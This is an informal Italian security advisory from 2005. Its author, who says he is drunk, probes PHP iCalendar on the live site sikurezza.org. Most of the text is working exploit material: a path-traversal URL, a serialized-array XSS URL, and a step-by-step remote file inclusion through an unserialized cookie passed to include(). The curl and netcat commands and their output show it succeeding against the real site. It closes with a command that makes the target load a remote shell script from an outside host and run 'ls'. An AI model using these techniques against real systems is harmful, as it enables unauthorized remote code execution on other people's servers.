ADVISORY UBRIACO E SFATTO NEL MENTRE DELLE 1.55 DOMENICA SMAU 2005 fin tanto i ragazzi annientano quello che e' rimasto di loro non trovo di meglio da fare (dopo il bianco ovviamente) che trovare vulns su sikurezza.org che pero' a quanto sembra e' tutto html.. tranne : ) 1) impatto LOW possibile data load e dos alle risorse dell'utente (pensiamo a vhost o a file in /tmp) http://www.sikurezza.org/calendario/day.php?cal=../../../home/www.maliCious.it/htdocs/bad&getdate=20051024 non so che impatto possa essere 3) impatto XSS penso http://phpicalendar.net/phpicalendar/includes/todo.php?vtodo_array=YTo4OntzOjM6ImNhbCI7czo5OiJIb21lIDEyMzQiO3M6MTQ6ImNvbXBsZXRlZF9kYXRlIjtOO3M6MTE6ImRlc2NyaXB0aW9uIjtzOjA6IiI7czo4OiJkdWVfZGF0ZSI7TjtzOjg6InByaW9yaXR5IjtOO3M6MTA6InN0YXJ0X2RhdGUiO3M6ODoiMjAwMjEwMTUiO3M6Njoic3RhdHVzIjtOO3M6MTA6InZ0b2RvX3RleHQiO3M6MTk6IlRoaXMgaXMgYSB0b2RvIGl0ZW0iO30= ma si passano gli array via url? che modi sono di fare? 2) impatto HIGHT presumo si possa fare un css (non xss) di file .php arbitrari -FILES\--------------------------- > config.inc.php $printview_default = 'no'; > index.php if (isset($_COOKIE['phpicalendar'])) { $phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar'])); $default_view = $phpicalendar['cookie_view']; } if ($printview_default == 'yes') { $printview = $default_view; $default_view = "print.php"; } else { $default_view = "$default_view".".php"; } include($default_view); -/FILES--------------------------- piccola precisazione: ma _COOKIE e' come _SESSION che devo scrivere in file non miei nella temp o chissa' dove? no > cokie.php C:\@Shell>curl http://devel.asciistation.zapto.org/ordine/hack-PHP-iCalendar/co kie.php -b ciao=ciao Array ( [ciao] => ciao ) ok, anche chi non programma in php ha capito a questo punto : ) semplifichiamo il php exploitabile > test.php quello che dovremo injiectare nel santo cookie sara' qualcosa di simile a a:1:{s:11:"cookie_view";s:23:"http://www.tin.it/index";} che abbiamo ottenuto grazie alla nuova versione di cookie.php quindi se noi proviamo su test.php questa curl $ curl "http://devel.asciistation.zapto.org/ordine/hack-PHP-iCalendar/test.php" -b phpicalendar=cookie.txt cookie.txt.php phpcalendar=a:1:{s:11:\"cookie_view\";s:23:\"http://www.tin.it/index\";} boh ho dei problemi di escape forse faccio meglio con netcat, minkia sono ubriaco e stanchissimo pero' vorrei debuggare sto problema.. e' tutta colpa di windows e del vino, ne sono quasi sicuro.. C:\@Shell>nc -l -p 80 -vvv listening on [any] 80 ... connect to [127.0.0.1] from asciistation [127.0.0.1] 4471 GET /ordine/hack-PHP-iCalendar/test.php HTTP/1.1 User-Agent: curl/7.11.1 (i686-pc-cygwin) libcurl/7.11.1 OpenSSL/0.9.7g zlib/1.2.2 Cookie: phpicalendar=a:1:{s:11:\"cookie_view\";s:23:\"http://www.tin.it/index\";} Host: devel.asciistation.zapto.org Pragma: no-cache Accept: */* ma diocan e' giusto.. Cookie: phpicalendar=a:1:{s:11:\"cookie_view\";s:23:\"http://www.tin.it/index\";} phpcalendar=a:1:{s:11:\"cookie_view\";s:23:\"http://www.tin.it/index\";} e dove manca sto byte? hehe sono un coglione.. no.. e' giusto... non mi capisco va bene mi sono rotto il cazzo GET /ordine/hack-PHP-iCalendar/test.php HTTP/1.1 Cookie: phpicalendar=a:1:{s:11:\"cookie_view\";s:23:\"http://www.tin.it/index\";} Host: devel.asciistation.zapto.org $ cat req.txt | nc localhost 80 HTTP/1.1 200 OK Date: Mon, 24 Oct 2005 00:11:03 GMT Server: Apache X-Powered-By: PHP/5.0.4 Set-Cookie: phpicalendar=a%3A1%3A%7Bs%3A11%3A%5C%22cookie_view%5C%22%3Bs%3A23%3A %5C%22http%3A%2F%2Fwww.tin.it%2Findex%5C%22%3B%7D Content-Length: 47 Connection: close Content-Type: text/html; charset=ISO-8859-1 1130112663 a:1:{s:11:\\\"cookie_view\\\"1 .php ah ma si che sono un asino, devo encodare!!! ma come mai le curl di merda non lo fanno per i fatti loro? phpicalendar=a%3A1%3A%7Bs%3A11%3A%5C%22cookie_view%5C%22%3Bs%3A23%3A%5C%22http%3A%2F%2Fwww.tin.it%2Findex%5C%22%3B%7D ok, riproviamo con le curl su test.php ok, riproviamo... a%3A1%3A%7Bs%3A11%3A%22cookie_view%22%3Bs%3A23%3A%22http%3A%2F%2Fwww.tin.it%2Findex%22%3B%7D Administrator@asciistation ~ $ curl http://devel.asciistation.zapto.org/ordine/hack-PHP-iCalendar/test.php - b 'phpicalendar=a%3A1%3A%7Bs%3A11%3A%22cookie_view%22%3Bs%3A23%3A%22http%3A%2F% 2Fwww.tin.it%2Findex%22%3B%7D' 1130112873 a:1:{s:11:\"cookie_view\";s:23:\"http://www.tin.it/index\";} http://www.tin.it/index.php GRAZIE GESU ora proviamo su sikurezza.org se funziona,in caso affermativo dovremmo vedere tin.it $ curl http://www.sikurezza.org/calendario/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11% 3A%22cookie_view%22%3Bs%3A23%3A%22http%3A%2F%2Fwww.tin.it%2Findex%22%3B%7D' Pagina non trovata - Tin.it - Generazione Internet
tin.it - Bello vivere con internet
PagineGialle 2311 [1] => 272777 [2] => 33184 [3] => 1 [4] => 0 [5] => 33 [6] => -1 [7] => 1488 [8] => 1130108071 [9] => 1092801991 [10] => 1128975280 [11] => -1 [12] => -1 [dev] => 2311 [ino] => 272777 [mode] => 33184 [nlink] => 1 [uid] => 0 [gid] => 33 [rdev] => -1 [size] => 1488 [atime] => 1130108071 [mtime] => 1092801991 [ctime] => 1128975280 [blksize] => -1 [blocks] => -1 ) che brutto vizio mettere uid 0 ai file.. non posso fare un cazzo : ) $ curl http://www.sikurezza.org/calendario/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11% 3A%22cookie_view%22%3Bs%3A34%3A%22http%3A%2F%2Fwww.ush.it%2Fteam%2Fascii%2Fshel l%22%3B%7D' -d 'user=ls'